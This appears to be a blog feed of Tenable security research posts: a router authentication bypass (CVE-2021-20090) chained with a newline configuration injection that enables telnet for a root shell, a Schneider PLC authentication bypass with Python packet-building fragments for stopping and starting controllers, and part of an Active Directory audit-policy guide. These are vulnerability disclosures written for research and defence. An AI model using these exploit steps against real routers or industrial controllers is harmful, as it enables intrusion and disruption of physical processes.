At the end, we will also take a quick look at how I discovered that the authentication bypass vulnerability was not limited to the Buffalo routers, and how it affects at least a dozen other models from multiple vendors spanning a period of over ten years.

Root shells on UART

It is fairly common for devices like these Buffalo routers to offer up a shell via a serial connection known as Universal Asynchronous Receiver/Transmitter (UART) on the circuit board. Manufacturers often leave test points or unpopulated pads on the circuit board for accessing UART. These are often used for debugging or testing the device during manufacture. In this case, we were extremely lucky that, after some poor soldering and testing, the WSR-2533DHPL2 offered up a BusyBox shell as root over UART.

In case this is new to anyone, let’s quickly walk through this process (there are many articles out there on the web with a more detailed walkthrough on hardware hacking and UART shells).

The first step is for us to open up the router’s case and try to identify if there is a way to access UART.

UART interface on the WSR-2533DHP3

We can see a header labeled J4 which may be what we’re looking for. The next step is to test the contacts with a multimeter to identify power (VCC), ground (GND), and our potential transmit/receive (TX/RX) pins. Once we’ve identified those, we can solder on some pins and connect them to a tool like JTAGulator to identify which pins we will communicate on, and at what baud rate.

Don’t worry, this isn’t my usual setup, just a shameless plug

We could identify this in other ways, but the JTAGulator makes it much easier. After setting the voltage we’re using (3.3V found using the multimeter earlier) we can run a UART scan which will try sending a carriage-return (or some other specified bytes) and receiving on each pin, at different bauds, which helps us identify what combination thereof will let us communicate with the device.

Running a UART scan on JTAGulator

The UART scan shows that sending a carriage return over pin 0 as TX, with pin 2 as RX, and a baud of 57600, gives an output of BusyBox v1, which looks like we may have our shell.

UART scan finding the settings we need

Sure enough, after setting the JTAGulator to UART Passthrough mode (which allows us to communicate with the UART port) using the settings we found with the UART scan, we are dropped into a root shell on the device.

We can now use this shell to explore the device, and transfer any interesting binaries to another machine for analysis. In this case, we grabbed the httpd binary which was serving the device’s web interface.

Httpd and web interface authentication

Having access to the httpd binary makes hunting for vulnerabilities in the web interface much easier, as we can throw it into Ghidra and identify any interesting pieces of code. One of the first things I tend to look at when analyzing any web application or interface is how it handles authentication.

While examining the web interface I noticed that, even after logging in, no session cookies are set, and no tokens are stored in local/session storage, so how was it tracking who was authenticated? Opening httpd up in Ghidra, we find a function named evaluate_access() which leads us to the following snippet:

Snippet from FUN_0041fdd4(), called by evaluate_access()

FUN_0041f9d0() in the screenshot above checks to see if the IP of the host making the current request matches that of an IP from a previous valid login.

Now that we know what evaluate_access() does, let’s see if we can get around it. Searching for where it is referenced in Ghidra, we can see that it is only called from one other function, process_request(), which handles any incoming HTTP requests.

process_request() deciding if it should allow the user access to a page

Something which immediately stands out is the logical OR in the larger if statement (lines 45–48 in the screenshot above) and the fact that it checks the value of uVar1 (set on line 43) before checking the output of evaluate_access(). This means that if the output of bypass_check(__dest) (where __dest is the url being requested) returns anything other than 0, we will effectively skip the need to be authenticated, and the request will go through to process_get() or process_post().

Let’s take a look at bypass_check().

Bypassing checks with bypass_check()

the bypass_list checked in bypass_check()

Taking a look at bypass_check() in the screenshot above, we can see that it is looping through bypass_list, and comparing the first n bytes of _dest to a string from bypass_list, where n is the length of the string grabbed from bypass_list. If no match is found, we return 0 and will be required to pass the checks in evaluate_access(). However, if the strings match, then we don’t care about the result of evaluate_access(), and the server will process our request as expected.

Glancing at the bypass list we see login.html, loginerror.html and some other paths/pages, which makes sense as even unauthenticated users will need to be able to access those urls.

You may have already noticed the bug here. bypass_check() is only checking as many bytes as are in the bypass_list strings. This means that if a user is trying to reach http://router/images/someimage.png, the comparison will match since /images/ is in the bypass list, and the url we are trying to reach begins with /images/. The bypass_check() function doesn’t care about strings which come after, such as “someimage.png”. So what if we try to reach /images/../<somepagehere>? For example, let’s try /images/..%2finfo.html. The /info.html url normally contains all of the nice LAN/WAN info when we first login to the device, but returns any unauthenticated users to the login screen. With our special url, we might be able to bypass the authentication requirement.
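The flawed comparison can be paraphrased in a few lines of Python (the bypass list here is abbreviated; the real list is embedded in the httpd binary):

```python
# Paraphrase of the decompiled bypass_check() logic. Abbreviated bypass list.
BYPASS_LIST = ["/login.html", "/loginerror.html", "/images/"]

def bypass_check(dest: str) -> bool:
    # flaw: only the first len(entry) bytes of the requested url are compared
    return any(dest[:len(entry)] == entry for entry in BYPASS_LIST)

assert bypass_check("/images/someimage.png")    # intended behavior
assert bypass_check("/images/..%2finfo.html")   # traversal slips through too
assert not bypass_check("/info.html")           # direct request still blocked
```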

After a bit of match/replace to account for relative paths, we still see an underwhelming display. We have successfully bypassed authentication using the path traversal (🙂 ) but we’re still missing something (🙁 ).

404s for requests made to .js files

Looking at the Burp traffic, we can see a number of requests to /cgi/<various_nifty_cgi>.js are returning a 404, which normally return all of the info we’re looking for. We also see that there are a couple of parameters passed when making requests to those files.

One of those parameters (_t) is just a datetime stamp. The other is an httoken, which acts like a CSRF token, and figuring out where / how those are generated will be discussed in the next section. For now, let’s focus on why these particular requests are failing.

Looking at httpd in Ghidra shows that there is a fair amount of debugging output printed when errors occur. Stopping the default httpd process, and running it from our shell shows that we can easily see this output which may help us identify the issue with the current request.

requests failing due to improper Referer header

Without diving into url_token_pass, we can see that it is saying the httoken is invalid from http://192.168.11.1/images/..%2finfo.html. We will dive into httokens next, but the token we have here is correct, which means the part causing the failure is the “from” url, which corresponds to the Referer header in the request. So, if we create a quick match/replace rule in Burp Suite that fixes the Referer header by removing the /images/..%2f, then we can see the info table, confirming our ability to bypass authentication.
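That Burp match/replace rule amounts to nothing more than stripping the traversal prefix from the Referer we send (a sketch; the device address is illustrative):

```python
# Sketch of the Referer fix-up performed by the Burp match/replace rule.
def fix_referer(referer: str) -> str:
    # url_token_pass rejects tokens "from" traversal urls, so drop the prefix
    return referer.replace("/images/..%2f", "/")

fixed = fix_referer("http://192.168.11.1/images/..%2finfo.html")
assert fixed == "http://192.168.11.1/info.html"
```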

our content loaded :)

A quick summary of where we are so far:

  • We can bypass authentication and access pages which should be restricted to authenticated users.
  • Those pages include access to httokens which let us make GET/POST requests for more sensitive info and grant the ability to make configuration changes.
  • We know we also need to set the Referer header appropriately in order for httokens to be accepted.

The adventure of getting proper httokens

While we know that the httokens are grabbed at some point on the pages we access, we don’t know where they’re coming from or how they’re generated. This will be important to understand if we want to carry this exploitation further, since they are required to do or access anything sensitive on the device. Tracking down how the web interface produces these tokens felt like something out of a Capture-the-Flag event.

The info.html page we accessed with the path traversal was populating its information table with data from .js files under the /cgi/ directory, and was passing two parameters. One, a date time stamp (_t), and the other, the httoken we’re trying to figure out.

We can see that the links used to grab the info from /cgi/ are generated using the URLToken() function, which sets the httoken (the parameter _tn in this case) using the function get_token(), but get_token() doesn’t seem to be defined anywhere in any of the scripts used on the page.

Looking right above where URLToken() is defined we see this strange string defined.

Looking into where it is used, we find the following snippet.

Which, when run adds the following script to the page:

We’ve found our missing getToken() function, but it looks to be doing something just as strange as the snippets that got us here. It is grabbing another encoded string from an image tag which appears to exist on every page (with differing encoded strings). What is going on here?

getToken() is getting data from this spacer img tag

The httokens are being grabbed from these spacer img src strings and are used to make requests to sensitive resources.

We can find a function where the httoken is being inserted into the img tag in Ghidra.

Without going into all of the details around the setting/getting of httoken and how it is checked for GET and POST requests, we will say that:

  • httokens, which are required to make GET and POST requests to various parts of the web interface, are generated server-side.
  • They are stored encoded in the img tags at the bottom of any given page when it loads
  • They are then decoded in client-side javascript.

We can use the tokens for any requests we need as long as the token and the Referer being used in the request match. We can make requests to sensitive pages using the token grabbed from login.html, but we still need the authentication bypass to access some actions (like making configuration changes).

Notably, on the WSR-2533DHPL2 just using this knowledge of the tokens means we can access the administrator password for the device, a vulnerability which appears to already be fixed on the WSR-2533DHP3 (despite both having firmware releases around the same time).

Now that we know we can effectively perform any action on the device without being authenticated, let’s see what we can do with that.

Injecting configuration options and enabling telnetd

One of the first things I check in any web interface or application with utilities like a ping function is how those utilities are implemented, because even a quick Google search turns up a number of historic examples of router ping utilities prone to command injection vulnerabilities.

While there wasn’t an easily achievable command injection in the ping command, looking at how it is implemented led to another vulnerability. When the ping command is run from the web interface, it takes an input of the host to ping.

After the request is made successfully, ARC_ping_ipaddress is stored in the global configuration file. Noting this, the first thing I tried was to inject a newline/carriage return character (%0A when url-encoded), followed by some text to see if we could inject configuration settings. Sure enough, when checking the configuration file, the text entered after %0A appears on a new line in the configuration file.

With this in mind, we can take a look at any interesting configuration settings we see, and hope that we’re able to overwrite them by injecting the ARC_ping_ipaddress parameter. There are a number of options seen in the configuration file, but one which caught my attention was ARC_SYS_TelnetdEnable=0. Enabling telnetd seemed like a good candidate for gaining a remote shell on the device.

It was unclear whether simply injecting ARC_SYS_TelnetdEnable=1 into the configuration file would work, as it would then be followed by a conflicting setting later in the file (ARC_SYS_TelnetdEnable=0 appears lower in the configuration file than ARC_ping_ipaddress). Regardless, I sent the following request in Burp Suite, followed by a reboot request (which is necessary for certain configuration changes to take effect).

Once the reboot completes we can connect to the device on port 23 where telnetd is listening, and are greeted with a root BusyBox shell, just like we have via UART.

Altogether now

Here are the pieces we need to put together in a python script if we want to make exploiting this super easy:

  • Get proper httokens from the img tags on a page.
  • Use those httokens in combination with the path traversal to make a valid request to apply_abstract.cgi
  • In that valid request to apply_abstract.cgi, inject the ARC_SYS_TelnetdEnable=1 configuration option
  • Send another valid request to reboot the device
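The injection step above can be sketched as follows. The body layout and token value are illustrative placeholders (a real httoken must first be scraped from the img tags); only the _tn and ARC_ping_ipaddress parameter names come from the traffic shown earlier.

```python
from urllib.parse import quote

# Hedged sketch of the body sent to apply_abstract.cgi. The httoken value is
# a placeholder; the newline (%0A) breaks out of ARC_ping_ipaddress and
# appends our own configuration setting.
def build_injection(httoken: str) -> str:
    payload = "192.168.11.1\nARC_SYS_TelnetdEnable=1"
    return f"_tn={httoken}&ARC_ping_ipaddress={quote(payload)}"

body = build_injection("deadbeef")
assert "ARC_ping_ipaddress=192.168.11.1%0AARC_SYS_TelnetdEnable%3D1" in body
```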
Running a quick PoC against the WSR-2533DHPL2

Surprise: More affected devices

Shortly before the 90 day disclosure date for the vulnerabilities discussed in this blog, I was trying to determine the number of potentially affected devices visible online via Shodan and BinaryEdge. In my searches, I noticed a number of devices which presented web interfaces very similar to those seen on the Buffalo devices. Too similar, in fact, as they appeared to use almost all the same strange methods for hiding the httokens in img tags, and javascript functions obfuscated in “enkripsi” strings.

The common denominator is that all of the devices were manufactured by Arcadyan. In hindsight, it should have been obvious to look for more affected devices outside of Buffalo’s product line given how much of the Buffalo firmware appeared to have been built by Arcadyan. However, after obtaining and testing a number of Arcadyan-manufactured devices it also became clear that not all of them were created equally, and the devices weren’t always affected in exactly the same way.

That said, all of the devices we were able to test or have tested via third-parties shared at least one vulnerability: The path traversal which allows an attacker to bypass authentication, now assigned as CVE-2021–20090. This appears to be shared by almost every Arcadyan-manufactured router/modem we could find, including devices which were originally sold as far back as 2008.

On April 21st, 2021, Tenable reported CVE-2021–20090 to four additional vendors (Hughesnet, O2, Verizon, Vodafone), and reported the issues to Arcadyan on April 22nd. As time went on it became clear that many more vendors were affected, and contacting and tracking them all would become very difficult, so on May 18th, Tenable reported the issues to the CERT Coordination Center for help with that process. A list of the affected devices can be found in Tenable’s own advisory, and more information can be found on CERT’s page tracking the issue.

There is a much larger conversation to be had about how this vulnerability in Arcadyan’s firmware has existed for at least 10 years and has therefore found its way through the supply chain into at least 20 models across 17 different vendors, and that is touched on in a whitepaper Tenable has released.

Takeaways

The Buffalo WSR-2533DHPL2 was the first router I’d ever purchased for the purpose of discovering vulnerabilities, and it was a super fun experience. The strange obfuscations and simplicity of the bugs made it feel like my own personal CTF. While I got a little more than I bargained for upon learning how widespread one of the vulnerabilities (CVE-2021–20090) was, it was an important lesson in how one should approach research on consumer electronics: The vendor selling you the device is not necessarily the one who manufactured it, and if you find bugs in a consumer router’s firmware, they could potentially affect many more vendors and devices than just the one you are researching.

I’d also like to encourage security researchers who are able to get their hands on one of the 20+ affected devices to take a look for (and report) any post-authentication vulnerabilities like the configuration injection found in the Buffalo routers. I suspect there are a lot more issues to be found in this set of devices, but each device is slightly different and difficult to obtain for researchers not living in the country where they are sold/provided by a local ISP.

Thanks for reading, and happy hacking!


Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo was originally published in Tenable TechBlog on Medium.

Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580)

13 July 2021 at 14:31

What you see in the picture above is similar to what you might see at a factory, plant, or inside a machine. At the core of it is Schneider Electric’s Modicon M340 programmable logic controller (PLC). It’s the module at the top right with the ethernet cable plugged in (see picture below), the brains of the operation.

Power supply, PLC, and IO modules attached to backplane.

PLCs are devices that coordinate, monitor, and control industrial processes or machines. They interface with modules (often interconnected through a shared backplane) that allow them to gather data from sensors (temperature, pressure, proximity, etc.) and send control signals to equipment such as motors, pumps, and heaters. They are typically hardened in order to survive in rough environments.

PLCs are typically connected to a Supervisory Control and Data Acquisition (SCADA) system or Human Machine Interface (HMI), the user interface for control systems. SCADA controllers can monitor and control multiple subordinate PLCs from one location, and like PLCs, are also monitored and controlled by humans through a connected HMI.

In our test system, we have a Schneider Electric Modicon M340 PLC. It can switch outlets on and off via solid state relays and is connected to my network via an ethernet cable. The engineering station software on my computer runs an HMI which allows me to turn the outlets on and off. Here is the simple HMI I designed for switching the outlets:

Simple Human Machine Interface (HMI)

The connected light is currently on (the yellow circle). Hitting the off button will turn off the actual light and turn the circle on the interface gray.

The engineering station contains programming software (Schneider Electric Control Expert) that allows one to program both the PLC and HMI interfaces.

A PLC is very similar to a virtual machine in its operation: it typically runs an underlying operating system or “firmware,” and the control program or “runtime” is started, stopped, and monitored by that underlying operating system.

EcoStruxure Control Expert — Engineering Station Software

These systems often operate in “air-gapped” environments (not connected to the internet) for security purposes, but this is not always the case. Additionally, it is possible for malware (e.g. Stuxnet) to make it into these environments when engineers or technicians plug outside equipment into the network, such as laptops used for maintenance.

Cyber security in industrial control systems has been severely lacking for decades, mostly due to the false sense of security given by “air-gaps” or segmented networks. Often, controllers are not protected by any sort of security at all, and some vendors claim that enforcing security is the responsibility of an intermediary system.

As a result of this somewhat lax standpoint towards security in industrial automation, there have been a few attacks recently that made the news:

Vendors are finally starting to wake up to this, and newer PLCs and software revisions are starting to implement more hardened security all the way down to the controller level. In this blog, I will examine the recent cyber security enhancements inside Schneider Electric’s Modicon M340 PLC.

Internet Connected Devices

The team did a cursory search on BinaryEdge to determine if any of these devices (including the M580, which we later learned was also affected) are connected to the internet. To our surprise, we found quite a few that appear legitimate across several industries including:

  • Water Treatment
  • Oil (production)
  • Gas
  • Solar
  • Hydro
  • Drainage / Levees
  • Dairy
  • Car Washes
  • Cosmetics
  • Fertilizer
  • Parking
  • Plastic Manufacturing
  • Air Filtration

Here is a breakdown of the top 10 affected countries at the time of this writing:

We alerted ICS-CERT to the presence of these devices prior to disclosure in the hope of mitigating any possible attacks.

PLC Engineering Station Connection

The engineering station talks to the PLC primarily via two protocols: FTP and Modbus. FTP is primarily used to upgrade the firmware on the device. Modbus is used to upload the runtime code to the controller, start/stop the controller runtime, and allow for remote monitoring and control via an HMI.

Modbus can be utilized over various transport layers such as ethernet or serial. In this blog, we will focus on Modbus over TCP/IP.

Modbus is a very simple protocol designed by Schneider Electric for communicating with multiple controllers for the purposes of monitoring and control. Here is the Modbus TCP/IP packet structure:

Modbus packet structure (from Wikipedia)

There are several predefined function codes in Modbus, like read/write coils (e.g. for operating relays attached to a PLC) or read/write registers (e.g. to read sensor data). For our controller (and many others), Schneider Electric has a custom function code called Unified Messaging Application Services, or UMAS. This function code is 0x5a (90 decimal), and the data bytes contain the underlying UMAS packet data. So in essence, UMAS is tunneled through Modbus.

After the 0x5a there are two bytes, the second of which is the UMAS packet type. In the image above, it is 0x02, which is a READ_ID request. You can find more information about the UMAS protocol, and a breakdown of the various message types, in this great writeup: http://lirasenlared.blogspot.com/2017/08/the-unity-umas-protocol-part-i.html.
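Based on the packet structure above, a UMAS request can be sketched as a Modbus TCP frame whose PDU starts with function code 0x5a. The session byte and transaction id values below are illustrative; the UMAS layout follows the linked writeup.

```python
import struct

# Sketch of a Modbus TCP frame carrying a UMAS request.
def umas_frame(transaction_id: int, umas_type: int, data: bytes = b"") -> bytes:
    pdu = bytes([0x5A, 0x00, umas_type]) + data        # func 0x5a, session, type
    # MBAP header: transaction id, protocol id 0, remaining length, unit id 0
    mbap = struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, 0)
    return mbap + pdu

frame = umas_frame(1, 0x02)   # 0x02 = READ_ID request
assert frame[7] == 0x5A and frame[9] == 0x02
```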

M340 Cyber Security

The recent cyber security enhancements in the M340 firmware (version 3.01 from 2/2019 and onward) are designed to prevent a remote attacker from executing certain functions on the controller, such as starting and stopping the runtime, reading and writing variables or system bits (to control program execution), or even uploading a new project to the controller, if an application password is configured under the “Project & Controller Protection” tab in the project properties. Because this protection is improperly implemented, it is possible to start and stop the controller without the password, as well as perform other control functions protected by the cyber security feature.

Auth Bypass

When connecting to a PLC, the client sends a request to read memory block <redacted> on the PLC before any authentication is performed. This block appears to contain information about the project (such as the project name, version, and file path to the project on the engineering station) and authentication information as well.

<redacted> memory block, containing authentication hashes

Here, “TenableFactory” is the project name. “AGC7MAIWE” is the “Crypted” program and safety project password. The base64 string is used afterwards to verify the application password. This is done as follows:

The actual password is only checked on the client side. To negotiate an authenticated session, or “reservation,” you first need to generate a 32-byte random nonce (a term for a random number generated once per session), send it to the server, and get one back. This is done through a new type of UMAS packet introduced with the cyber security upgrades, which is <redacted>. I’ve highlighted the nonces (client followed by server) exchanged below:

The next step is to make a reservation using packet type <redacted>. With the new cyber security enhancements, in addition to the computer name of the connecting host, an ASCII SHA256 hash is also appended:

This hash is generated as follows:

SHA256 (server_nonce + base64_str + client_nonce)

The base64 string is from the first block <redacted> read and in this case would be:

"pMESWEjNgAY=\r\nf6A17wsxm7F5syxa75GsQhNVC4bDw1qrEhnAp08RqsM=\r\n"

You do not need to know the actual password to generate this SHA256.
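Putting that together (the nonces below are dummy 32-byte values; base64_str is the value read earlier from the redacted memory block):

```python
from hashlib import sha256

# The reservation hash from the steps above, with dummy nonces.
client_nonce = bytes(range(32))
server_nonce = bytes(range(32, 64))
base64_str = b"pMESWEjNgAY=\r\nf6A17wsxm7F5syxa75GsQhNVC4bDw1qrEhnAp08RqsM=\r\n"

reservation_hash = sha256(server_nonce + base64_str + client_nonce).hexdigest()
# the ASCII hex digest gets appended to the computer name in the reservation
assert len(reservation_hash) == 64
```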

The response contains a byte at the end (here it is 0xc9) that needs to be included after the 0x5a in protected requests (such as starting and stopping the PLC runtime).

To generate a request to a protected function (such as start PLC runtime) you first start with the base request:

# start PLC request
to_send = "\x5a" + check_byte + "\x40\xff\x00"

check_byte in this case would be 0xc9 from the reservation request response. You then calculate two hashes:

auth_hash_pre = sha256(hardware_id + client_nonce).digest()
auth_hash_post = sha256(hardware_id + server_nonce).digest()

hardware_id can be obtained by issuing an info request (0x02):

Here the hardware_id is 06 01 03 01.

Once you have the hashes above, you calculate the “auth” hash as follows:

auth_hash = (sha256(auth_hash_pre + to_send + auth_hash_post).digest())

The complete packet (without modbus header) is built as follows:

start_plc_pkt = ("\x5a" + check_byte + "\x38\x01" + auth_hash + to_send)
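The fragments above can be combined into a single helper. check_byte and hardware_id vary per session and device; the values used below are the examples from this writeup, and the nonces are dummies.

```python
from hashlib import sha256

# The request-building fragments above, combined into one function.
def build_start_plc(check_byte: bytes, hardware_id: bytes,
                    client_nonce: bytes, server_nonce: bytes) -> bytes:
    to_send = b"\x5a" + check_byte + b"\x40\xff\x00"        # start PLC request
    auth_hash_pre = sha256(hardware_id + client_nonce).digest()
    auth_hash_post = sha256(hardware_id + server_nonce).digest()
    auth_hash = sha256(auth_hash_pre + to_send + auth_hash_post).digest()
    return b"\x5a" + check_byte + b"\x38\x01" + auth_hash + to_send

pkt = build_start_plc(b"\xc9", b"\x06\x01\x03\x01", b"\x00" * 32, b"\x11" * 32)
assert len(pkt) == 41 and pkt[0] == 0x5A   # modbus header still to be prepended
```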

Put everything together in a PoC and you can do things like start and stop controllers remotely:

Proof of Concept in action

A complete PoC (auth_bypass_poc.py) can be found here:

<redacted>

Here is a demo video of the exploit in action, against a model water treatment plant:

Ideally, the controller itself should verify the password. Using an ephemeral key-exchange algorithm such as Diffie-Hellman to negotiate a pre-shared key, the password could be encrypted using a cipher such as AES and securely shared with the controller for evaluation. Better yet, certificate authentication could be implemented, which would allow access to be easily revoked from one central location.

Program and Safety Password

If the Crypted box is checked, a weak, non-cryptographically-sound custom algorithm of unknown origin is used, which reveals the length of the password (the length of the hash equals the length of the password).

Program and Safety Protection Password Crypted Option

If the “Crypted” box isn’t checked, this password is stored in plaintext, which is a password disclosure issue.

Here is a reverse engineered implementation I wrote in python:

This appears to be a custom hashing function, as I couldn’t find anything similar to it during my research. There are a couple of issues I’ve noticed. First, the length of the hash matches the length of the password, revealing the password length. Secondly, the hash itself is limited in characters (A-Z and 0–9) which is likely to lead to hash collisions. It is easily possible to find two plaintext messages that hash to the same value, especially with smaller passwords. For example, ‘acq’, ‘asq’, ‘isy’ and ‘qsq’ all hash to ‘5DF’.
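To illustrate why a length-preserving hash over a 36-character alphabet invites collisions, here is a brute-force collision search. The real Schneider algorithm is redacted, so `stand_in_hash` below is a made-up toy function with the same output shape (one A-Z/0-9 character per input character); it is purely a demonstration of the search approach, not the actual hash.

```python
from itertools import product
from string import ascii_lowercase

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

def stand_in_hash(pw: str) -> str:
    # Toy stand-in, NOT the real algorithm: each output character mixes
    # adjacent input characters mod 36, preserving the input length.
    n = len(pw)
    return "".join(ALPHABET[(ord(pw[i]) + ord(pw[(i + 1) % n])) % 36]
                   for i in range(n))

def find_collision(length: int = 3):
    # Exhaustively hash short lowercase passwords until two collide.
    seen = {}
    for chars in product(ascii_lowercase, repeat=length):
        pw = "".join(chars)
        h = stand_in_hash(pw)
        if h in seen and seen[h] != pw:
            return seen[h], pw, h
        seen[h] = pw
    return None
```

With only 36**n possible digests for length-n passwords, the search space collapses quickly for short passwords, which is exactly the weakness the examples above (‘acq’, ‘asq’, ‘isy’, ‘qsq’) demonstrate.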

Firmware Web Server Errata

Here are a few things I noticed while examining the controller firmware, specifically having to do with the built-in PLC web server they call FactoryCase. This is not enabled by default.

Predictable Web Nonce

The web nonce is calculated by concatenating a few timestamps to a hardcoded string. Therefore, it would be possible to predict what values the nonce might take within a certain time frame.

The proper way to calculate a nonce is to use a cryptographically secure random number generator.
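The fix is essentially a one-liner. The sketch below contrasts the two approaches; the "predictable" version is a guess at the general pattern (hardcoded string plus timestamps), not Schneider's exact concatenation.

```python
import secrets
import time

def predictable_nonce() -> str:
    # Roughly the flawed pattern: a hardcoded string plus timestamps.
    # Anyone who knows the string can enumerate candidates for a time window.
    return "HARDCODED" + str(int(time.time())) + str(int(time.time() * 1000) % 1000)

def secure_nonce(num_bytes: int = 16) -> str:
    # Draw from the OS CSPRNG instead; 16 bytes -> 32 hex characters.
    return secrets.token_hex(num_bytes)
```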

Rot13 Storage of Web Password Data

It appears that the plaintext web username and password are stored somewhere locally on the controller using rot13. Ideally, these should be stored using a salted hash. If the controller were stolen, it might be possible for an attacker to recover this password.
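rot13 is an encoding, not encryption: anyone with the flash contents recovers the credentials instantly. A sketch of the difference, with PBKDF2 standing in for "salted hash" (the controller's actual storage format is unknown to us):

```python
import codecs
import hashlib
import os

# What the controller appears to do: trivially reversible.
stored = codecs.encode("SuperSecret1", "rot13")
recovered = codecs.decode(stored, "rot13")  # attacker gets the password back

# What it should do: store a salt plus a slow salted hash, and only ever
# compare digests at login time.
salt = os.urandom(16)
digest = hashlib.pbkdf2_hmac("sha256", b"SuperSecret1", salt, 100_000)

def verify(password: str) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return candidate == digest
```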

Conclusion

What at the surface looks like authentication, especially when viewing a packet capture, actually isn’t when you dig into the details. Some critical errors were made and not caught during the design and testing of the authentication mechanisms. More oversight and auditing is needed for the security mechanisms in critical products such as this. It’s as critical as the waterproofing, heat shielding, and vibration hardening in the hardware. These flaws should not have made it past critical design review.

This goes back to a core tenet of security: you can’t trust a client. You have to verify every interaction server side. You cannot rely on client-side software (a.k.a. the “Engineering Station”) to do the security checks. This verification needs to be done at every level, all the way down to the PLCs.

Another violated tenet: don’t roll your own crypto. There are plenty of standard cryptographic algorithms implemented in well-tested, well-designed libraries, and published authentication standards that are easy enough to borrow. You will make a mistake trying to implement it yourself.

We disclosed the vulnerability to Schneider Electric in May 2021. As per https://www.zdnet.com/article/modipwn-critical-vulnerability-discovered-in-schneider-electric-modicon-plcs/, the vulnerability was first reported to Schneider in Fall 2020. In the interest of keeping sensitive systems “safer”, we have had to redact multiple opcodes and PoC code from the blog as this is one of those rarest of rare cases where full disclosure couldn’t be followed. After many animated internal discussions, we had to take this step even though we are proponents of full disclosure. Schneider hasn’t provided an ETA yet on when this issue would be fixed, saying that it is still many months out. We were also informed that five other researchers have co-discovered and reported this issue.

While vendors are expected to patch within 90 days of disclosure, the ICS industry as a whole hasn’t evolved to the extent it should have in terms of security maturity to meet these expectations. Given the sensitive industries where these PLCs are deployed, one would imagine that we would have come a long way by now in terms of elevating the security posture. Prioritizing and funding a holistic Security Development Lifecycle (SDL) is key to reducing cyber exposure and raising the bar for attackers. However, many of these systems are just sitting there unguarded and, in some cases, without anyone aware of the potential danger.

See https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-01 for Schneider Electric’s advisory.

See https://us-cert.cisa.gov/ics/advisories/icsa-21-194-02 for ICS-CERT’s advisory.


Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

6 July 2021 at 21:54

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit policy

Tenable.ad can detect Active Directory attacks. To do this, the solution needs to collect security events from the monitored Domain Controllers to be analyzed and correlated. Fortunately, Windows offers built-in audit policy settings to configure which events should be logged. But when testing those options, we noticed surprising behaviors that can lead to missed events.

When you configure your Active Directory domain controllers to log security events to send to your SIEM and raise alerts, you absolutely do not want any regression which would ultimately blind your SOC! In this article we will share technical tips to prevent those unexpected issues.

Disclaimer

This content is based on observations and our interpretation of Microsoft documentation. This article is provided “as-is” and we do not provide any guarantee of correctness nor exhaustiveness and you should only rely on Microsoft guidance.

Introduction

Starting with Windows 2000, Windows offered only simple audit policy settings grouped in nine categories. Those are referred to as “top-level categories” or “basic audit policy” and they are still available in modern versions.

Later, “granular auditing” was introduced with Windows Vista / 2008 (it was configurable only via “auditpol.exe”) and then Windows 7 / 2008 R2 (configurable via GPO). Those are referred to as “sub-level categories” or “advanced audit policy”.

Each basic setting corresponds to a mix of several advanced settings. For example, from Microsoft Advanced security auditing FAQ:

Enabling the single basic account logon setting would be the equivalent of setting all four advanced account logon settings.

The content described in this article was tested on Windows Active Directory domain controllers because those are the most appropriate sources of interest for Active Directory attacks detection, but it should apply to all kinds of Windows machines (servers & workstations).

Surprise #1 — Advanced audit policy fully replaces the basic policy

As soon as we enable even just one advanced audit policy setting, Windows fully switches to advanced policy mode and ignores all existing basic policies (at least on the recent versions of Windows we tested)! Here is a demonstration:

  • Before: the system uses basic settings. We enable “Success, Failure” for “Audit privilege use” (green highlighting) and for other categories the default values apply. This works as expected:
  • After: we only enable one advanced setting (green highlighting). Notice how everything else is not audited anymore, including what we explicitly configured in the basic policy (red highlighting)!

Therefore, you cannot have both and thus when you start using the advanced audit policy, which you should, you are committed to it and should abandon the basic settings to prevent confusion.

Microsoft Advanced security auditing FAQ explains it:

When advanced audit policy settings are applied by using Group Policy, the current computer’s audit policy settings are cleared before the resulting advanced audit policy settings are applied. After you apply advanced audit policy settings by using Group Policy, you can only reliably set system audit policy for the computer by using the advanced audit policy settings. […] Important: Whether you apply advanced audit policies by using Group Policy or by using logon scripts, do not use both the basic audit policy settings under Local Policies\Audit Policy and the advanced settings under Security Settings\Advanced Audit Policy Configuration. Using both advanced and basic audit policy settings can cause unexpected results in audit reporting.

➡️ Tenable.ad recommendation: use advanced audit policy settings only. Existing basic audit policies should be converted.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #2 — Advanced audit policy may be ignored

However, there are some cases where basic audit policy settings may still take priority over the ones defined in the advanced audit policy. Correctly understanding when and where it could happen is complicated.

As per Microsoft Advanced security auditing FAQ:

If you use Advanced Audit Policy Configuration settings or use logon scripts to apply advanced audit policies, be sure to enable the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” policy setting under “Local Policies\Security Options”. This will prevent conflicts between similar settings by forcing basic security auditing to be ignored.

➡️ Tenable.ad recommendation: once you start using advanced audit policy, we recommend enabling the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” GPO setting to prevent undesired surprises. Its default value being “Enabled”, it should already be effective anyway in the majority of environments.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #3 — Advanced audit policy default values are not respected

As we saw previously, as soon as we enable even just one advanced audit policy setting the system entirely switches to the advanced mode. The question we may have now is how does the system manage the other settings that we did not specify? There are certainly sensible default values, aren’t there? These default values are described in the documentation of each audit policy setting. Let’s read the explanation of the “Audit Logon” setting:

So, here on a server I should expect a default value of “Success, Failure” for the “Audit Logon” setting if not configured, shouldn’t I? Well, we may have a surprise here.

Here is the configuration I applied on my server: I enabled “Success” logging for “Audit Account Lockout” and left “Audit Logon” as “Not Configured”:

However, when looking at the resulting audit policy I notice that “Logon” events are not audited, contrary to their default:

We knew we should not rely on defaults… but this one is really surprising. Of course we made sure that there was no other GPO defining any audit policy setting.

